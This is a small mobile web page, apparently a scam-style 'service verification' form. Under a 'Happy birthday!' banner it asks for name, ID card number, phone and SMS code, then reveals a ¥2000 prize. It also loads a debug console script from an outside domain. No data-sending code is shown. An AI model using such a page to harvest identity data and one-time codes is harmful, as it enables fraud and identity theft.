<!DOCTYPE html>
<html>
<head>
    <!--设置字符编码-->
    <meta charset="UTF-8">
    <!--手机开发屏幕自适应-->
    <meta name="viewport" content="width=device-width,initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
    <!--设置标题-->
    <title>服务验证</title>
    <!--引入ico-->
    <!--<link rel="shortcut icon" href="static/favicon.ico?v=2">-->
    <script src="static/lib/flexible.js"></script>
</head>
<body>
    <canvas id="canvas" class="canvas"></canvas>
    <div class="bg"></div>
    <div class="header">
        <i src="" alt="" class="logo"></i>
        <p class="prompt">Happy birthday!</p>
    </div>
    <div class="moon"><i></i></div>
    <div class="from-wrap" id="from">
        <div class="from-item">
            <label class="from-label" for="name">姓名</label>
            <div class="from-value">
                <input type="text" maxlength="20" id="name" placeholder="请输入申请人">
            </div>
        </div>
        <div class="from-item">
            <label class="from-label" for="card">身份证号</label>
            <div class="from-value">
                <input type="tel" maxlength="18" id="card" placeholder="请输入身份证号">
            </div>
        </div>
        <div class="from-item">
            <label class="from-label" for="phone">手机号</label>
            <div class="from-value">
                <input type="tel" maxlength="11" id="phone" placeholder="请输入手机号">
            </div>
        </div>
        <div class="from-item">
            <label class="from-label" for="code">验证码</label>
            <div class="from-value">
                <input type="tel" maxlength="6" id="code" placeholder="请输入验证码">
            </div>
            <div class="from-code">
                <span>获取</span>
            </div>
        </div>
        <div class="from-button">
            <span>验证</span>
        </div>
    </div>
    <div class="prize-wrap hidden" id="prize-wrap"></div>
    <div class="result hidden">
        <span>￥2000</span>
    </div>
    <div class="footer">
        <span>由</span>
        <i class="icon"></i>
        <span>提供服务支持</span>
    </div>
    <script src="http://www.owulia.com/ink/static/eruda.min.js"></script>
    <script>eruda.init();</script>
</body>
</html>

